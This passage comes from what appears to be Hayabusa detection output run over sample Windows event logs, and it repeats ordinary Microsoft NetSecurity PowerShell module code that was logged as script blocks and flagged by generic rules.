[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 
'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) 
} if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] 